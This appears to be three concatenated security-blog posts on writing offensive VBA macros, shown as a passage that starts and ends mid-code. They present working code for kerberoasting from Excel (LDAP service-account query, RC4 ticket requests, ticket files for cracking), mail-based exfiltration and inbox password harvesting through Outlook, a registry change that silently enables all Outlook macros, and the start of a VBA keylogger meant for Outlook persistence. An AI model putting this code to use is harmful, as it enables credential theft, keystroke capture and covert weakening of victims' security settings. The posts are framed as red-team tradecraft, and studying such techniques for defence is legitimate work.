Put #1, lWritePos, encodedTicket
Close #1
Of course instead of saving them to disk, we should exfiltrate the ticket via HTTPs or any other method. Then we can convert the KiRBi ticket into a HashCat-friendly format using the kirbi2hashcat.py script:
mothra@arcadia:/tmp|⇒ python kirbi2hashcat.py test.kirbi
$krb5tgs$23$2c4b4631e22d9e82823810dd51b11e17$1c1c0be320175b6486644311922fed8e3ee5a900112edbabe50b11d1a9b1f4609d30499616a8beb93071914f3eeade1e582878a1ad8c5574fbbc689569797aba9039da9f04ba3d91c3f12a307455d25e221fff21807d9d8d7e75492290be4922cf027e01aeae3e74eda64f6a258445b7547db94e9b5a153746a81b46d5b9a9d1c15794fb3cd6c488ac437ccb6a2612edcda95a2474854c73413024363c7dc40f3938b6ea988e246847fab0ed19433617870c05555dcee9b335f34774098f66a022437b75e22a787c9285276cd68a173f12fa0fbb2c41dafbf30e960f7404daee3b33d188a567e89f381e54936dfae1e3da74c6c50315308fa5dcb5af4e1e1ac9b2df5385cd8755365675c3aa8126ad62b24d5738c7ab665529c36aa09edc8a9935949142ccb75ade84596cf973700590d51e449eafb86a7b5149b89cb1232ac7823145c857d0762cbaf9c8a175e0783becd0c3f12dbf1ce02bca6d18e0d6a42949f5ac9a2442a94b1176ad3da71884be36da506c5e0aa2faf503c2ac5197b75ab1bce9f55abfbb8b374cfeacebac5a3d4ce3d01c23ce62312d5906846ea0b47d74b740dd5a1eac1451f599c6a0b6827bbe2a434a93646cb6990133392508b4e4650f635ae214b47cc1e7e135bd4d6ceaa188a61abd3dcbb5355a7fb48d6041bb6ff2c19b2a38fd2ec001e49794c61b0162393a94ba33da8d06df500cb39965ace726f542aacf2715f24c3a22e8e82c50f3b36f4ebb168c46f524c2c142521dca1e597e316fbf7ec1b7cb8810e63f39062d8369cf44e4b085bb1c85b7813c771644eaf7dfc7bce47238d77a5254edf5b179a4b34c1e567bb46aea4f965539f4e87425ceb17badcbd079dfc01d2a99270476592c4f4ea2718e3a55f6d8f61688b40669d0a13a3c3937feabc54a11e038e4c5a336273fd4601b5853d1e5df0d9a945cc2dbf2500c6f7bfc3099d386b9d7078b0f5850be93c4e2e220fbee3b19fdf3f9e18148495f409eb1b94fb43898bcdf512e32e4689d6e7414d2e51a8a605e5db0ca79f8dc5b0a34e3969dd5cca607aa0d63bc0146df647ae6126375a7723f1439401f1646f1be6c6cf98c27ab6bf3f3e4d571e8670288be55d11f5530aafff5fdecd108542ea78dfc1427e46761176dc5923418114164502d2981c03e7d3632ebb308d8f5e5ae258a7b545d95d25ba85139de8acafe20814e6074d1ed4528dd0ae8e69bf5dc18248a7ccb111bbcc13fa91d7eae0d5d688121d9fae6a574e0154dedeb3049e5f6c1c458950b3000e3174aec2d750cfc08ac8f29818b504e89feec8e68d2dc82a0211816ebe05c22c990692ba971bda7f4900262701873532c611a49b8e85c7a2fb4ab0ae79ca579e14a4a7fb3829a730b0e8e19d7e97a1ba05c17f9baafa52ca702e31bb7874cfa0db0af1452185987fbc991e333870268eb3cdf78008570f7f65ae4db99cfc10874f5c5c036af163ffe5ca35231904933b661b482bdcb04a75dcd626b3ce75b257df36b06589cae1ad73539f5de1f88e8b329e0999f56977ad9ef85a5d8dff00c89d121565ae720a3f4b458f84f46418dbe67f06600a600bb33d469cadd61061ca6ee1a6b4e0a011bb74b5c73d4361ebf2391b6fc9bf8a36ae63bb67a6dd5ebabc4d1
Now we have a way to request TGS tickets for SPNs, but how can we get our targets? We can use LDAP queries. I adapted the code from this post to perform a query with the filter (&(samAccountType=805306368)(servicePrincipalName=*))
.
Our final code is:
Private Declare PtrSafe Function LsaConnectUntrusted Lib "SECUR32" (ByRef LsaHandle As LongPtr) As Long
Private Declare PtrSafe Function LsaLookupAuthenticationPackage Lib "SECUR32" (ByVal LsaHandle As LongPtr, ByRef PackageName As LSA_STRING, ByRef AuthenticationPackage As LongLong) As Long
Private Declare PtrSafe Function LsaCallAuthenticationPackage Lib "SECUR32" (ByVal LsaHandle As LongPtr, ByVal AuthenticationPackage As LongLong, ByVal ProtocolSubmitBuffer As LongPtr, ByVal SubmitBufferLength As Long, ProtocolReturnBuffer As Any, ByRef ReturnBufferLength As Long, ByRef ProtocolStatus As Long) As Long
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
Private Declare PtrSafe Function GetProcessHeap Lib "KERNEL32" () As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongLong) As LongPtr
Private Declare PtrSafe Function HeapFree Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, lpMem As Any) As Long
Private Type LSA_STRING
Length As Integer
MaximumLength As Integer
Buffer As String
End Type
Private Enum KERB_PROTOCOL_MESSAGE_TYPE
KerbDebugRequestMessage = 0
KerbQueryTicketCacheMessage
KerbChangeMachinePasswordMessage
KerbVerifyPacMessage
KerbRetrieveTicketMessage
KerbUpdateAddressesMessage
KerbPurgeTicketCacheMessage
KerbChangePasswordMessage
KerbRetrieveEncodedTicketMessage
KerbDecryptDataMessage
KerbAddBindingCacheEntryMessage
KerbSetPasswordMessage
KerbSetPasswordExMessage
KerbVerifyCredentialsMessage
KerbQueryTicketCacheExMessage
KerbPurgeTicketCacheExMessage
KerbRefreshSmartcardCredentialsMessage
KerbAddExtraCredentialsMessage
KerbQuerySupplementalCredentialsMessage
KerbTransferCredentialsMessage
KerbQueryTicketCacheEx2Message
End Enum
Private Type SecHandle
dwLower As LongPtr
dwUpper As LongPtr
End Type
Private Type KERB_RETRIEVE_TKT_REQUEST
MessageType As KERB_PROTOCOL_MESSAGE_TYPE
LogonIdLower As Long
LogonIdHigher As LongLong
TargetNameLength As Integer
TargetNameMaximumLength As Integer
TargetNameBuffer As LongPtr
TicketFlags As Long
CacheOptions As Long
EncryptionType As Long
CredentialsHandle As SecHandle
End Type
Sub askTGS(target As String)
Dim Status As Long
Dim SubStatus As Long
Dim pLogonHandle As LongPtr
Dim Name As LSA_STRING
Dim pPackageId As LongLong
Dim KerbRetrieveRequest As KERB_RETRIEVE_TKT_REQUEST
Dim KerbRetrieveResponse As LongPtr
Dim ResponseSize As Long
Status = LsaConnectUntrusted(pLogonHandle)
If Status <> 0 Then
MsgBox "Error, LsaConnectUntrusted failed!"
Return
End If
With Name
.Length = Len("Kerberos")
.MaximumLength = Len("Kerberos") + 1
.Buffer = "Kerberos"
End With
Status = LsaLookupAuthenticationPackage(pLogonHandle, Name, pPackageId)
If Status <> 0 Then
MsgBox "Error, LsaLookupAuthenticationPackage failed!"
Return
End If
With KerbRetrieveRequest
.MessageType = KerbRetrieveEncodedTicketMessage
.EncryptionType = 23 'KERB_ETYPE_RC4_HMAC_NT
.CacheOptions = 8 'KERB_RETRIEVE_TICKET_AS_KERB_CRED
.TargetNameLength = LenB(target)
.TargetNameMaximumLength = LenB(target) + 2
.TargetNameBuffer = 1337 'random value, we change it later
End With
'Copy the struct to an array and add the string with the target
Dim tmpBuffer() As Byte
Dim Dummy As String
ReDim tmpBuffer(0 To LenB(KerbRetrieveRequest) - 1)
Call CopyMemory(VarPtr(tmpBuffer(0)), VarPtr(KerbRetrieveRequest), LenB(KerbRetrieveRequest) - 1)
Dummy = StrConv(tmpBuffer, vbUnicode)
Dummy = Dummy & StrConv(target, vbUnicode)
'Get the buffer memory address
Dim fixedAddress As LongPtr
Dim tempToFix() As Byte
tempToFix = StrConv(Dummy, vbFromUnicode)
fixedAddress = VarPtr(tempToFix(64))
'Alloc memory from heap and copy the struct
Dim heap As LongPtr
Dim mem As LongPtr
heap = GetProcessHeap()
mem = HeapAlloc(heap, 0, LenB(KerbRetrieveRequest) + LenB(target))
Call CopyMemory(mem, VarPtr(tempToFix(0)), LenB(KerbRetrieveRequest) + LenB(target))
'Fix the buffer address
fixedAddress = mem + 64
Call CopyMemory(mem + 24, VarPtr(fixedAddress), 8)
'Do the call
Status = LsaCallAuthenticationPackage(pLogonHandle, pPackageId, mem, LenB(KerbRetrieveRequest) + LenB(target), KerbRetrieveResponse, ResponseSize, SubStatus)
If Status <> 0 Then
MsgBox "Error, LsaCallAuthenticationPackage failed!"
End If
'Copy KERB_RETRIEVE_TKT_RESPONSE structure to an array
Dim Response() As Byte
Dim Data As String
ReDim Response(0 To ResponseSize)
Call CopyMemory(VarPtr(Response(0)), KerbRetrieveResponse, ResponseSize)
'Ticket->EncodedTicketSize
Dim ticketSize As Integer
Call CopyMemory(VarPtr(ticketSize), VarPtr(Response(136)), 4)
'Ticket->EncodedTicket (address)
Dim encodedTicketAddress As LongPtr
Call CopyMemory(VarPtr(encodedTicketAddress), VarPtr(Response(144)), 8)
'Ticket->EncodedTicket (value)
Dim encodedTicket() As Byte
ReDim encodedTicket(0 To ticketSize)
Call CopyMemory(VarPtr(encodedTicket(0)), encodedTicketAddress, ticketSize)
'Save it (change it to send the ticket directly to your endpoint)
Dim fileName As String
fileName = Replace(target, "/", "_")
fileName = Replace(fileName, ":", "_")
MsgBox fileName
Open fileName & ".kirbi" For Binary Access Write As #1
lWritePos = 1
Put #1, lWritePos, encodedTicket
Close #1
End Sub
'Helper
Public Function toStr(pVar_In As Variant) As String
On Error Resume Next
toStr = CStr(pVar_In)
End Function
Sub kerberoast() 'https://www.remkoweijnen.nl/blog/2007/11/01/query-active-directory-from-excel/
'Get the domain string ("dc=domain, dc=local")
Dim strDomain As String
strDomain = GetObject("LDAP://rootDSE").Get("defaultNamingContext")
'ADODB Connection to AD
Dim objConnection As Object
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Open "Provider=ADsDSOObject;"
'Connection
Dim objCommand As ADODB.Command
Set objCommand = CreateObject("ADODB.Command")
objCommand.ActiveConnection = objConnection
'Search the AD recursively, starting at root of the domain
objCommand.CommandText = _
"<LDAP://" & strDomain & ">;(&(samAccountType=805306368)(servicePrincipalName=*));,servicePrincipalName;subtree"
Dim objRecordSet As ADODB.Recordset
Set objRecordSet = objCommand.Execute
Dim i As Long
If objRecordSet.EOF And objRecordSet.BOF Then
Else
Do While Not objRecordSet.EOF
For i = 0 To objRecordSet.Fields.Count - 1
askTGS (toStr(objRecordSet!servicePrincipalName(0)))
Next i
objRecordSet.MoveNext
Loop
End If
'Close connection
objConnection.Close
'Cleanup
Set objRecordSet = Nothing
Set objCommand = Nothing
Set objConnection = Nothing
End Sub
The VBA is dark and full of terrors, so please do not walk this path alone.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is about tricks to transcribe well-known attacks and TTPs to the VBA cursed language. Please, take a seat and listen to the story.
There are high chances of invoking daemons from other dimensions while coding tools in the form of VBA macros. Please proceed with caution and always under adult supervision.
As explained in our article Hacking in an epistolary way: implementing kerberoast in pure VBA, we are implementing well-known attacks as VBA macros. This task is extremely frustrating due to restrictions imposed by VBA, which often require workarounds and hacky tricks to address situations that are a nonissue in most other languages. Most of the times we have to google through old forums to find a suitable solution, so we decided to create this article where some of those tricks are collected, so that in 2020 you do not have to waste your time as we did.
Keep in mind that we are focused on implementing the attacks avoiding the usage of process injections, binary drops or PowerShell. We do it calling Windows APIs directly with pure VBA :)
offsetof
for the hours savedOne of the most common problems we had to face when creating VBA tools was creating the data structures used by the APIs. VBA types can be a bit tricky, but once you learn their sizes it is easier to mentally translate a C structure to VBA. Except when you have to deal with misalignments. That is a pain in the ass.
Recently, one of our owls created a VBA Macro to extract and decrypt passwords saved in Chrome. In the process of creating such Cronenberg’s abomination of code, a problem arised: calls to bcryptdecrypt()
for the AES-GCM decryption were failing with “INVALID_PARAMETERS” status. However, checking the call with API Monitor showed no issues, and after a few hours of practicing the ancient sport of hitting a wall with your head, the problem was located: the structure members were misplaced.
This function uses the BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
structure, defined as:
typedef struct _BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO {
ULONG cbSize;
ULONG dwInfoVersion;
PUCHAR pbNonce;
ULONG cbNonce;
PUCHAR pbAuthData;
ULONG cbAuthData;
PUCHAR pbTag;
ULONG cbTag;
PUCHAR pbMacContext;
ULONG cbMacContext;
ULONG cbAAD;
ULONGLONG cbData;
ULONG dwFlags;
} BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, *PBCRYPT_AUTHENTICATED_CIPHER_MODE_INFO;
If you start to blindly translate the structure to VBA, just matching its types, the structure will be misaligned. The easiest way to know where every member should be, aligning the appropiate types (with padding if needed), is to use offsetof
:
#include <windows.h>
#include <bcrypt.h>
#include <stdio.h>
int main()
{
printf("cbSize=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbSize));
printf("dwInfoVersion=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, dwInfoVersion));
printf("pbNonce=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, pbNonce));
printf("cbNonce=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbNonce));
printf("pbAuthData=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, pbAuthData));
printf("cbAuthData=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbAuthData));
printf("pbTag=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, pbTag));
printf("cbTag=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbTag));
printf("pbMacContext=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, pbMacContext));
printf("cbMacContext=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbMacContext));
printf("cbAAD=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbAAD));
printf("cbData=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, cbData));
printf("dwFlags=%d\n", offsetof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO, dwFlags));
printf("sizeof=%d\n", sizeof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO));
return 0;
}
Which returns the offset of each structure member:
cbSize=0
dwInfoVersion=4
pbNonce=8
cbNonce=16
pbAuthData=24
cbAuthData=32
pbTag=40
cbTag=48
pbMacContext=56
cbMacContext=64
cbAAD=68
cbData=72
dwFlags=80
sizeof=88
Now you can set the types and paddings needed to properly align the structure :)
Working with memory is pretty easy once you get used to do so. If no fancy stuff is needed, you can just declare an empty byte array (Dim stuff() as Bytes
) and then resize it as needed using redim (redim stuff(0 To Size-1)
). In order to copy memory we are going to call RtlMoveMemory
, and VarPtr
gives us a pointer to an element inside the array. Imagine a function call that returned a pointer to a memory structure from which we want to retrieve a value (let’s say it is at offset 64 with size 16):
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'(...)
dim tmpBuf() as Byte
dim ReturnedPointer as LongPtr
'(...)
ReturnedPointer = something(arg1,arg2)
redim tmpBuf(0 To 15) 'size - 1
Call CopyMemory (VarPtr(tmpBuf(0)), ReturnedPointer + 64, 16)
'(...)
We can also work with the heap in the same way (code reused from the kerberoast post):
Private Declare PtrSafe Function GetProcessHeap Lib "KERNEL32" () As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "KERNEL32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongLong) As LongPtr
'(...)
Dim heap As LongPtr
Dim mem As LongPtr
heap = GetProcessHeap()
mem = HeapAlloc(heap, 0, LenB(KerbRetrieveRequest) + LenB(target))
Call CopyMemory(mem, VarPtr(tempToFix(0)), LenB(KerbRetrieveRequest) + LenB(target))
'''(...)
In case you want to retrieve a field that is a pointer, you can directly copy its value to a LongLong
or LongPtr
variable (this also applies to other numeric values like sizes, you only need to set the appropiate variable type).
Dim pointer As LongPtr
Call CopyMemory(VarPtr(pointer), VarPtr(something(144)), 8)
Keeping the value inside a LongPtr
instead of a byte array makes it easier to use it later (to do arithmetics or to pass it as a function argument)
If a function returns an LPSTR
or LWPSTR
and we need to use it in the VBA itself, we are copying its value to a byte array as done before, but this time calculating the string size using lstrlenA()
or lstrlenW()
. Then, if the string is ANSI, we use strconv(array,vbUnicode)
. There is a good example in this post:
'Converting an LPTSTR (ANSI) String Pointer to a VBA String
Private Declare PtrSafe Function lstrlenA Lib "kernel32.dll" (ByVal lpString As LongPtr) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" _
(ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
Public Function StringFromPointerA(ByVal pointerToString As LongPtr) As String
Dim tmpBuffer() As Byte
Dim byteCount As Long
Dim retVal As String
' determine size of source string in bytes
byteCount = lstrlenA(pointerToString)
If byteCount > 0 Then
' Resize the buffer as required
ReDim tmpBuffer(0 To byteCount - 1) As Byte
' Copy the bytes from pointerToString to tmpBuffer
Call CopyMemory(VarPtr(tmpBuffer(0)), pointerToString, byteCount)
End If
' Convert (ANSI) buffer to VBA string
retVal = StrConv(tmpBuffer, vbUnicode)
StringFromPointerA = retVal
End Function
'Converting an LPWSTR (Unicode) String Pointer to a VBA String
Private Declare PtrSafe Function lstrlenW Lib "kernel32.dll" (ByVal lpString As LongPtr) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" _
(ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
Public Function StringFromPointerW(ByVal pointerToString As LongPtr) As String
Const BYTES_PER_CHAR As Integer = 2
Dim tmpBuffer() As Byte
Dim byteCount As Long
' determine size of source string in bytes
byteCount = lstrlenW(pointerToString) * BYTES_PER_CHAR
If byteCount > 0 Then
' Resize the buffer as required
ReDim tmpBuffer(0 To byteCount - 1) As Byte
' Copy the bytes from pointerToString to tmpBuffer
Call CopyMemory(VarPtr(tmpBuffer(0)), pointerToString, byteCount)
End If
' Straigth assigment Byte() to String possible - Both are Unicode!
StringFromPointerW = tmpBuffer
End Function
This article is just an addendum to our previous article “Hacking in an epistolary way”. We wanted to share a few tricks to help others build their own macros.
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
Dear Fellowlship, today’s homily is the last chapter of our trilogy about our epistolary-daemonic relationship with VBA. This time we are going to talk about how to interact with Outlook from Excel using macros, and also we are going to release a PoC where we turn Outlook into a keylogger. Please, take a seat and listen to the story.
We promise this is the last time @TheXC3LL will publish about VBA. We have scheduled an exorcism this weekend to release his daemons, so he can write again about vulnerabilities and other stuff different to VBA.
In our first chapter we talked about the concept of “Hacking in a epistolary way”, where we started to implement attacks and TTPs directly in VBA macros avoiding process injections, dropping binaries or calling external programs that are flagged (like Powershell). This time we are going to shift our focus to Outlook.
First of all we have to say that you can interact with Outlook directly from other Microsoft Office apps via VBA using the object Outlook.Application
. This means that we can abuse Outlook functionalities from within Excel, so we can look for confidential information inside the inbox or we can exfiltrate data via mails. To send a mail only a few lines are needed:
'https://docs.microsoft.com/es-es/office/vba/api/outlook.namespace
Sub send_mail_example()
Dim xOutApp As Object
Dim xOutMail As Object
Dim xMailBody As String
Set xOutApp = CreateObject("Outlook.Application")
Set xOutMail = xOutApp.CreateItem(0)
xMailBody = "You did it!"
On Error Resume Next
With xOutMail
.To = "[email protected]"
.CC = ""
.BCC = ""
.Subject = "Macro executed " & Environ("username")
.Body = xMailBody
.Send
End With
On Error GoTo 0
Set xOutMail = Nothing
Set xOutApp = Nothing
End Sub
If we do not want a copy in the “Sent” folder we can set the property DeleteAfterSubmit
as True after we set the Body
. This will move directly the mail to the Deleted folder, so it is a bit more stealthy. To fully erradicate the mail we need to locate the mail (as item) inside the Deleted folder and then call the method Remove
via MAPI.
The object Outlook.Application
gives us also access to the namespace MAPI and all its methods. This is important because we can interact with the mail boxes without knowing the credentials. For example, we can use our macro to search all the received mails that contains the word “password” in its body:
Sub retrieve_passwords()
Dim xOutApp As Object
Dim xOutMail As Object
Dim xMailBody As String
Set xOutApp = CreateObject("Outlook.Application")
Set outlNameSpace = xOutApp.GetNamespace("MAPI")
Set myTasks = outlNameSpace.GetDefaultFolder(6).Items
Dim i As Integer
i = 1
For Each olMail In myTasks
If (InStr(1, UCase(olMail.Body), "PASSWORD", vbTextCompare) > 0) Then
Cells(i, 1) = olMail.Body ' Here we are just showing the info in the Excel sheets, but you can exfiltrate it as we saw before ;D
i = i + 1
End If
Next
Set xOutMail = Nothing
Set xOutApp = Nothing
End Sub
Plaintext passwords inside mailboxes are probably one of the most common sins we are used to see in our engagements. A macro of this kind aimed to the right target can give you the Heaven’s keys.
Another interesting information that we can get using MAPI is the Global Address List (GAL). In the address list we can find names, usernames, phone numbers, etc. Here we are just collecting usernames:
'https://www.excelcise.org/extract-outlook-global-address-list-details-with-vba/
Sub global_address_list()
Dim xOutApp As Object
Dim xOutMail As Object
Dim xMailBody As String
Set xOutApp = CreateObject("Outlook.Application")
Set outlNameSpace = xOutApp.GetNamespace("MAPI")
Set outlGAL = outlNameSpace.GetGlobalAddressList()
Set outlEntry = outlGAL.AddressEntries
On Error Resume Next
'loop through address entries and extract details
For i = 1 To outlEntry.Count
Set outlMember = outlEntry.Item(i)
If outlMember.AddressEntryUserType = olExchangeUserAddressEntry Then
Cells(i, 1) = outlMember.GetExchangeUser.Name
End If
Next i
Set xOutMail = Nothing
Set xOutApp = Nothing
End Sub
The main issue is that retrieving this information can take a really long time if the company is big (we are talking about ~5-10 minutes), so it is a bit unpractical to be used in a real scenario. However both approaches can be executed inside Outlook via OTM files as we will see below.
In the last years various persistence methods related to Outlook were released and implemented in the tool Ruler. These methods were based on the execution of VBA code via Custom Forms and Home Pages. Both attacks are now patched, so we have to move forward.
Recently Dominic Chell published the article A Fresh Outlook on Mail Based Persistence where the persistence is achieved dropping a VbaProject.OTM file that is later loaded by Outlook. This is the path that we choosed here. But instead of using a payload to get a shell or parasite a process with our C2, we are going to create a keylogger in pure VBA :).
Outlook is one of the long term alive programs in an average office computer. It is launched since the workday beginning and is not closed until the worker leaves the office, so makes sense to use it as a keylogger. The plan is quite simple: we need to build an Excel file that modifies the registry (so Outlook can execute macros freely) and drops the OTM file with our keylogger.
As the registry key is under HKEY_CURRENT_USER
we do not need special privileges to modify the value (by default it is set at level 3 Notifications for digitally signed macros, all other macros disabled) so we enable the load and execution of macros by changing the value to 1 (Enable all Macros):
Sub disable_macro_security()
Dim myWS As Object
Set myWS = VBA.CreateObject("WScript.Shell")
Dim name As String, value As Integer, stype As String
name = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Outlook\Security\Level"
value = 1
stype = "REG_DWORD"
myWS.RegWrite name, value, stype
End Sub
We use the Excel version (Application.Version
) to calculate the right location of the key to be modified. After that the OTM file can be dropped to Environ("appdata") & "\Microsoft\Outlook\VbaProject.OTM"
(it can be packed inside a resource, form, or taken directly from internet and then read/unpack and dropped). It is nothing new, all the good ol’ techniques to drop files apply here, let’s move to the OTM contents and the keylogger.
For our keylogger we are going to use the function NtUserGetRawInputData
that is not documented in the MSDN. But as usual: if something is not covered by Microsoft, go and check ReactOS. Luckily it is documented:
DWORD APIENTRY NtUserGetRawInputData ( HRAWINPUT hRawInput,
UINT uiCommand,
LPVOID pData,
PUINT pcbSize,
UINT cbSizeHeader
)
Also we can see that it is exported by win32u.dll, so our definition in VBA will be:
Private Declare PtrSafe Function NtUserGetRawInputData Lib "win32u" (ByVal hRawInput As LongPtr, ByVal uiCommand As LongLong, ByRef pData As Any, ByRef pcbSize As Long, ByVal cbSizeHeader As Long) As LongLong
Our approach will be the well-known technique of creating a window with a callback to snoop messages until we get a WM_INPUT
and then use NtUserGetRawInputData
to get the input data. To build the structures correctly (like RAWKEYBOARD
) we can use offsetof
as we described in our article Shedding light on creating VBA macros, so we can check the size of each field and pick VBA types accordingly.
Our macro has to be split in two parts
ThisOutlookSession
Keylogger
.In ThisOutlookSession
we only place the trigger that will execute our payload when Outlook starts:
Sub Application_Startup()
Keylogger.launcher
End Sub
We need to place the “real” payload inside another module to be allowed to use the operator AddressOf, because we use it to set the callback to our window class. The Keylogger
module code (remember: this is just a PoC that does not handle errors/exceptions, the intention of this code is just to exemplify how to build one):
'This can be hidden using DispCallFunc trick
Private Declare PtrSafe Function RegisterClassEx Lib "user32" Alias "RegisterClassExA" (pcWndClassEx As WNDCLASSEX) As Integer
Private Declare PtrSafe Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, ByVal lpParam As LongPtr) As LongPtr
Private Declare PtrSafe Function DefWindowProc Lib "user32" Alias "DefWindowProcA" (ByVal hwnd As LongPtr, ByVal wMsg As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Private Declare PtrSafe Function GetMessage Lib "user32" Alias "GetMessageA" (lpMsg As MSG, ByVal hwnd As LongPtr, ByVal wMsgFilterMin As Long, ByVal wMsgFilterMax As Long) As Long
Private Declare PtrSafe Function TranslateMessage Lib "user32" (lpMsg As MSG) As Long
Private Declare PtrSafe Function DispatchMessage Lib "user32" Alias "DispatchMessageA" (lpMsg As MSG) As LongPtr
Private Declare PtrSafe Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function RegisterRawInputDevices Lib "user32" (ByRef pRawInputDevices As RAWINPUTDEVICE, ByVal uiNumDevices As Integer, ByVal cbSize As Integer) As Boolean
Private Declare PtrSafe Function NtUserGetRawInputData Lib "win32u" (ByVal hRawInput As LongPtr, ByVal uiCommand As LongLong, ByRef pData As Any, ByRef pcbSize As Long, ByVal cbSizeHeader As Long) As LongLong
Private Declare PtrSafe Function GetProcessHeap Lib "kernel32" () As LongPtr
Private Declare PtrSafe Function HeapAlloc Lib "kernel32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, ByVal dwBytes As LongLong) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByRef Destination As Any, ByVal Source As LongPtr, ByVal Length As Long)
Private Declare PtrSafe Function HeapFree Lib "kernel32" (ByVal hHeap As LongPtr, ByVal dwFlags As Long, lpMem As Any) As Long
Private Declare PtrSafe Function GetForegroundWindow Lib "user32" () As LongPtr
Private Declare PtrSafe Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As LongPtr) As Long
Private Declare PtrSafe Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As LongPtr, ByVal lpString As LongPtr, ByVal cch As Long) As Long
Private Declare PtrSafe Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Private Declare PtrSafe Function GetKeyboardState Lib "user32" (pbKeyState As Byte) As Long
Private Declare PtrSafe Function ToAscii Lib "user32" (ByVal uVirtKey As Long, ByVal uScanCode As Long, lpbKeyState As Byte, ByVal lpwTransKey As LongLong, ByVal fuState As Long) As Long
Private Declare PtrSafe Function MapVirtualKey Lib "user32" Alias "MapVirtualKeyA" (ByVal wCode As Long, ByVal wMapType As Long) As Long
Private Type WNDCLASSEX
cbSize As Long
style As Long
lpfnWndProc As LongPtr
cbClsExtra As Long
cbWndExtra As Long
hInstance As LongPtr
hIcon As LongPtr
hCursor As LongPtr
hbrBackground As LongPtr
lpszMenuName As String
lpszClassName As String
hIconSm As LongPtr
End Type
Private Type POINTAPI
x As Long
y As Long
End Type
Private Type MSG
hwnd As LongPtr
Message As Long
wParam As LongPtr
lParam As LongPtr
time As Long
pt As POINTAPI
End Type
Private Type RAWINPUTDEVICE
usUsagePage As Integer
usUsage As Integer
dwFlags As Long
hwndTarget As LongPtr
End Type
Private Type RAWINPUTHEADER
dwType As Long '0-4 = 4 bytes
dwSize As Long '4-8 = 4 Bytes
hDevice As LongPtr '8-16 = 8 Bytes
wParam As LongPtr '16-24 = 8 Bytes
End Type
Private Type RAWKEYBOARD
MakeCode As Integer '0-2 = 2 bytes
Flags As Integer '2-4 = 2 bytes
Reserved As Integer '4-6 = 2 bytes
VKey As Integer '6-8 = 2 bytes
Message As Long '8-12 = 4 bytes
ExtraInformation As Long '12-16 = 4 bytes
End Type
Private Type RAWINPUT
header As RAWINPUTHEADER
data As RAWKEYBOARD
End Type
Public oldTitle As String
Public newTittle As String
Public lastKey As Long
Public cleaner(0 To 255) As Byte
Private Function FunctionPointer(addr As LongPtr) As LongPtr
' https://renenyffenegger.ch/notes/development/languages/VBA/language/operators/addressOf
FunctionPointer = addr
End Function
'https://www.freevbcode.com/ShowCode.asp?ID=209
Public Function ByteArrayToString(bytArray() As Byte) As String
Dim sAns As String
Dim iPos As String
sAns = StrConv(bytArray, vbUnicode)
iPos = InStr(sAns, Chr(0))
If iPos > 0 Then sAns = Left(sAns, iPos - 1)
ByteArrayToString = sAns
End Function
Public Sub launcher()
Dim hwnd As LongPtr
Dim mesg As MSG
Dim wc As WNDCLASSEX
Dim result As LongPtr
Dim HWND_MESSAGE As Long
'Some initialization for later
oldTitle = "AdeptsOf0xCC"
lastKey = 0
'First we need to set a window class
wc.cbSize = LenB(wc)
wc.lpfnWndProc = FunctionPointer(AddressOf WndProc) 'We need to save this code as Module in order to use the AddressOf trick to get the our callback location
wc.hInstance = GetModuleHandle(vbNullString)
